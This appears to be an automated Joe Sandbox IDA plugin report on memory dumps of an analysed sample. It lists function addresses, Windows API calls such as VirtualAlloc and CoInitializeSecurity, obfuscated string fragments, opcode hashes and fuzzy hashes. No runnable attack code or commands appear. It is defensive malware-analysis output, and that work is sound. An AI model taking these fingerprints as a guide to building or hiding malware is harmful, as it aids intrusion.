Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 49caa0a7a1f2d2137e01a90c31e0c1e82979d1b42073edc3ff3b8b3f5404ce59
Instruction ID: 18b60a3bba2ab2dc9e0d95297c0d08a40fcfa30b0e9d58e009aebb5f1adb990b
Opcode Fuzzy Hash: 49caa0a7a1f2d2137e01a90c31e0c1e82979d1b42073edc3ff3b8b3f5404ce59
Instruction Fuzzy Hash: 0901F9B46097058FE305DF28D498B5ABBF1FB89304F10881CE495CB3A1C779A949CF81

Function 000BCDF0 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 000BCE04

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 3538b1f4e6e5582bf20d0a29a825bb50ce4b7a61567239bd2d8c5680bf897fed
Instruction ID: 0314cc43eabbad6a1b04c6c37e95686b8714f617b19c4ebe20bb8ac4619b646c
Opcode Fuzzy Hash: 3538b1f4e6e5582bf20d0a29a825bb50ce4b7a61567239bd2d8c5680bf897fed
Instruction Fuzzy Hash: 81D0A7212A054827E150A21CDC57F37325CC743B68F000626A2A2C66D1D8406921E566

Function 000BCE23 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 000BCE36

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: fc31c3d8cd677f4aed3f02cc00ec9345496673ee67df797eddd3bcc466c17ba1
Instruction ID: e501a5c69eddb4f20b6305e52759b9bba6c05f57e35ff146325719c986e09197
Opcode Fuzzy Hash: fc31c3d8cd677f4aed3f02cc00ec9345496673ee67df797eddd3bcc466c17ba1
Instruction Fuzzy Hash: B8D0C9313D430277F5388A08AC63F2522058302F14FB00A19B322FEAD0C8D47112D51A

Function 000E9B60 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,00000000,000C2F5C), ref: 000E9B80

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 3e54e76bba05109b954abe0bd75b3de3bb27b00ae780db71c588f14a4af1c0b8
Instruction ID: d468148ce88a7b6c66556c34928526134e548671e42b5ad0da166f971f114580
Opcode Fuzzy Hash: 3e54e76bba05109b954abe0bd75b3de3bb27b00ae780db71c588f14a4af1c0b8
Instruction Fuzzy Hash: E4D0A931005022EBCA406B28BC11BC73A689F08330F0B0890B4006A060C2AAACC1CAC0

Function 000E9B40 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,000C4E57,00000400), ref: 000E9B50

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 136d2f363543c3dbe4e901128251817a7c58b0d54146c6b0a5360d5e1e01cb98
Instruction ID: 469ca695ca8e46d55de92d67fe91e2ec766e41ff987080d9357b3dc0a84065e2
Opcode Fuzzy Hash: 136d2f363543c3dbe4e901128251817a7c58b0d54146c6b0a5360d5e1e01cb98
Instruction Fuzzy Hash: 62C04831145124AADA10AB15EC09FCA3A68AF457A0F1A04A1B445660B286A2AC828A99

Function 0010A276 Relevance: 1.3, APIs: 1, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000), ref: 0010A4B0

Memory Dump Source

Source File: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 4d23f0b961734df79ae105f63dcd4bf6e1e20aaf027a88c7f5782f8cc5b01085
Instruction ID: 69f5996d808e7fa0b66309c5d057e7e7ab8f7859eb8a2e8024b0d68f10776621
Opcode Fuzzy Hash: 4d23f0b961734df79ae105f63dcd4bf6e1e20aaf027a88c7f5782f8cc5b01085
Instruction Fuzzy Hash: 97F0A5B650C601DFE309AF29D98566DFBE5FF58310F02492DD9C583240D7B218A09B4B

Function 00109BDD Relevance: 1.3, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000), ref: 00109BE8

Memory Dump Source

Source File: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 4e3be51f3a5da4c0cf3cf8713a86e015950b417c29133f6bb20e4954ccefb01c
Instruction ID: a60dbf56cf8370154d26fb6e8eb213391e3466095087038725a6180f476101df
Opcode Fuzzy Hash: 4e3be51f3a5da4c0cf3cf8713a86e015950b417c29133f6bb20e4954ccefb01c
Instruction Fuzzy Hash: 90E0127500C609CBDB046F78880926EBBA0EF14321F220708E8E6827D0C3729C218A5B

Non-executed Functions

Function 000C2670 Relevance: 165.6, Strings: 131, Instructions: 1885COMMON

Download Yara Rule

Strings

[, xrefs: 000C30AE
F, xrefs: 000C3912
~, xrefs: 000C3991
}, xrefs: 000C3758
t, xrefs: 000C39C1
f, xrefs: 000C35CA
J, xrefs: 000C3AF1
I, xrefs: 000C2EFF
p, xrefs: 000C3D07
!, xrefs: 000C32D0
a, xrefs: 000C4282
Z, xrefs: 000C2B89
a, xrefs: 000C3903
T, xrefs: 000C3AC1
`, xrefs: 000C43F1
f, xrefs: 000C3CC7
`, xrefs: 000C4287
c, xrefs: 000C3FAB
Z, xrefs: 000C3A71
b, xrefs: 000C44AE
., xrefs: 000C2CFF
a, xrefs: 000C43EC
@, xrefs: 000C3D27
m, xrefs: 000C36D8
H, xrefs: 000C3AE1
A, xrefs: 000C2757
P, xrefs: 000C3AA1
x, xrefs: 000C3197
j, xrefs: 000C39F1
], xrefs: 000C30BE
{, xrefs: 000C3748
:, xrefs: 000C3076
D, xrefs: 000C3908
a, xrefs: 000C44B3
b, xrefs: 000C3415
9, xrefs: 000C28B7
O, xrefs: 000C3D37
Z, xrefs: 000C3DF7
p, xrefs: 000C3CE7
c, xrefs: 000C4278
{, xrefs: 000C2B7F
r, xrefs: 000C39B1
I, xrefs: 000C2D37
b, xrefs: 000C41A9
a, xrefs: 000C3C97
a, xrefs: 000C341A
f, xrefs: 000C3A51
q, xrefs: 000C36F8
a, xrefs: 000C41AE
w, xrefs: 000C3CB7
U, xrefs: 000C307E
c, xrefs: 000C41A4
h, xrefs: 000C2CF7
W, xrefs: 000C308E
c, xrefs: 000C43E2
/, xrefs: 000C32B8
b, xrefs: 000C3A31
n, xrefs: 000C3A11
8, xrefs: 000C2D4F
c, xrefs: 000C3410
,, xrefs: 000C2CEF
@, xrefs: 000C3B21
, xrefs: 000C2D0F
", xrefs: 000C2D1F
h, xrefs: 000C39E1
y, xrefs: 000C2A62
^, xrefs: 000C3A91
`, xrefs: 000C41B6
r, xrefs: 000C2D07
N, xrefs: 000C3B11
b, xrefs: 000C3FB0
', xrefs: 000C2D47
b, xrefs: 000C427D
J, xrefs: 000C2F04
t, xrefs: 000C3177
g, xrefs: 000C3CA7
u, xrefs: 000C3718
Y, xrefs: 000C309E
., xrefs: 000C40F1
r, xrefs: 000C3D17
K, xrefs: 000C2F09
`, xrefs: 000C3FBA
|, xrefs: 000C3C87
D, xrefs: 000C4338
q, xrefs: 000C2D17
v, xrefs: 000C39D1
$, xrefs: 000C2D2F
M, xrefs: 000C40E9
\, xrefs: 000C3A81
O, xrefs: 000C3B19
X, xrefs: 000C3A61
E, xrefs: 000C390D
L, xrefs: 000C3D87
l, xrefs: 000C3A01
|, xrefs: 000C3750
`, xrefs: 000C341F
Y, xrefs: 000C2B84
4, xrefs: 000C26D2
l, xrefs: 000C2EFA
y, xrefs: 000C3738
`, xrefs: 000C33A8
a, xrefs: 000C3FB5
o, xrefs: 000C36E8
L, xrefs: 000C3B01
s, xrefs: 000C3708
, xrefs: 000C32C8
p, xrefs: 000C39A1
|, xrefs: 000C3981
3, xrefs: 000C27E6
\, xrefs: 000C30B6
w, xrefs: 000C3728
&, xrefs: 000C2D3F
V, xrefs: 000C3AD1
b, xrefs: 000C43E7
c, xrefs: 000C44A9
*, xrefs: 000C2CDF
1, xrefs: 000C352C
/, xrefs: 000C294E
3, xrefs: 000C2861
d, xrefs: 000C3A41
D, xrefs: 000C3F09
V, xrefs: 000C2E52
`, xrefs: 000C44B8
~, xrefs: 000C3187
e, xrefs: 000C3CD7
6, xrefs: 000C3288
x, xrefs: 000C3961
z, xrefs: 000C3971
8, xrefs: 000C3527
R, xrefs: 000C3AB1
`, xrefs: 000C3A21

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID: $ $!$"$$$&$'$*$,$.$.$/$/$1$3$3$4$6$8$8$9$:$@$@$A$D$D$D$E$F$H$I$I$J$J$K$L$L$M$N$O$O$P$R$T$U$V$V$W$X$Y$Y$Z$Z$Z$[$\$\$]$^$`$`$`$`$`$`$`$`$a$a$a$a$a$a$a$a$b$b$b$b$b$b$b$c$c$c$c$c$c$d$e$f$f$f$g$h$h$j$l$l$m$n$o$p$p$p$q$q$r$r$r$s$t$t$u$v$w$w$x$x$y$y$z${${$|$|$|$}$~$~
API String ID: 0-970517751
Opcode ID: ee68bf495d3137fc45e4719f919d8915600c03c64687eac1719d061f03257d6a
Instruction ID: fbaad6141613447b2642afcab6f71e4e9718737faa9478bafc16b49d42ac8544
Opcode Fuzzy Hash: ee68bf495d3137fc45e4719f919d8915600c03c64687eac1719d061f03257d6a
Instruction Fuzzy Hash: 6F03893120C7C18AD335DB3884957AFBBE2ABD6314F188A6DE0E9873D2D6798545CB13

Function 000E6690 Relevance: 19.0, Strings: 15, Instructions: 246COMMON

Download Yara Rule

Strings

Z, xrefs: 000E66A8
j, xrefs: 000E6795
#, xrefs: 000E68ED
Y, xrefs: 000E66F0
~, xrefs: 000E674F
C, xrefs: 000E6898
Y, xrefs: 000E66A3
X, xrefs: 000E66EB
i, xrefs: 000E6893
Z, xrefs: 000E66F5
e, xrefs: 000E6786
5, xrefs: 000E689D
\, xrefs: 000E688E
X, xrefs: 000E669E
`, xrefs: 000E678B

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID: #$5$C$X$X$Y$Y$Z$Z$\$`$e$i$j$~
API String ID: 0-3294723363
Opcode ID: 218b22c1c0bb5ff38fa90c5a0a5a95447d190bf781458c7b06e1a19171da4b10
Instruction ID: 471ede5d0d2ddb4f82a0e6d11885d7871316b398643231ba51998928fcf98e9f
Opcode Fuzzy Hash: 218b22c1c0bb5ff38fa90c5a0a5a95447d190bf781458c7b06e1a19171da4b10
Instruction Fuzzy Hash: D991F423A0C7D04ED3158579985435FAED30BF2264F2DCA6DE4E5973C6C9BAC90683A3

Function 0027905B Relevance: 12.9, Strings: 9, Instructions: 1664COMMON

Download Yara Rule

Strings

>pb[, xrefs: 002798CF
^N, xrefs: 0027A0D9
?Rm?, xrefs: 002791A0
xJY[, xrefs: 00279DBE
N}n>, xrefs: 002795E8
~;ow, xrefs: 0027912D
J{~, xrefs: 0027A34C
>pb[, xrefs: 002798C2
XYW, xrefs: 00279111

Memory Dump Source

Source File: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID: >pb[$>pb[$?Rm?$N}n>$XYW$xJY[$~;ow$J{~$^N
API String ID: 0-2621282779
Opcode ID: 4d2c3e10913cb28bcf5423d319940913da6e925d075922defd1a8850a80cae43
Instruction ID: b1cd7227fc2bfa9c3c1461d7e78dfb7bb7d22c547c4d10a73d4188240bbade0e
Opcode Fuzzy Hash: 4d2c3e10913cb28bcf5423d319940913da6e925d075922defd1a8850a80cae43
Instruction Fuzzy Hash: 8AB218F3A082009FE304AE2DDC8567AF7E9EF94720F1A853DEAC4D7744EA3558058697

Function 000B9360 Relevance: 10.4, Strings: 8, Instructions: 405COMMON

Download Yara Rule

Strings

YAG~u, xrefs: 000B95EE
`;;2, xrefs: 000B9734
`;;2, xrefs: 000B960E
8>&:, xrefs: 000B94B7
}x, xrefs: 000B93C0
, xrefs: 000B96A0, 000B977E
/37), xrefs: 000B94A7
u, xrefs: 000B9549

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID: /37)$8>&:$YAG~u$`;;2$`;;2$u$}x$
API String ID: 0-2031701488
Opcode ID: afbf182f086d4cb3678fef5cd9cf034a3b5aeb1cf8c39da1fee8d2667e1554dd
Instruction ID: 3df3088211bc6f523ab83ba62808a9c0f4d54dc357e7ec78fc9f141d8e311049
Opcode Fuzzy Hash: afbf182f086d4cb3678fef5cd9cf034a3b5aeb1cf8c39da1fee8d2667e1554dd
Instruction Fuzzy Hash: 7CC1397160C7914FD355CF2984A03AFBFD2AFD7215F1889ACE5D28B381D6398909C7A2

Function 002775AB Relevance: 10.4, Strings: 7, Instructions: 1640COMMON

Download Yara Rule

Strings

dzb|, xrefs: 00278241
3=[, xrefs: 0027851B
&_m, xrefs: 00277E02
?|_v, xrefs: 00277BD0
iA}, xrefs: 00277B3F
M~, xrefs: 00277D92
'LKX, xrefs: 00277A1F

Memory Dump Source

Source File: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID: 'LKX$?|_v$dzb|$iA}$&_m$3=[$M~
API String ID: 0-86079843
Opcode ID: 5fb37952b61967dd3fdf865abd9bc166638bb6b44336777ab5764d75a77b47ce
Instruction ID: 45e665219668cf93093d19bd4e22acde7dc67b8321fa02a3ae0b14a5afa4d5cf
Opcode Fuzzy Hash: 5fb37952b61967dd3fdf865abd9bc166638bb6b44336777ab5764d75a77b47ce
Instruction Fuzzy Hash: 33B228F360C6049FE304AE2DEC8567ABBE5EFD4720F1A893DE6C4C3744EA3558058696

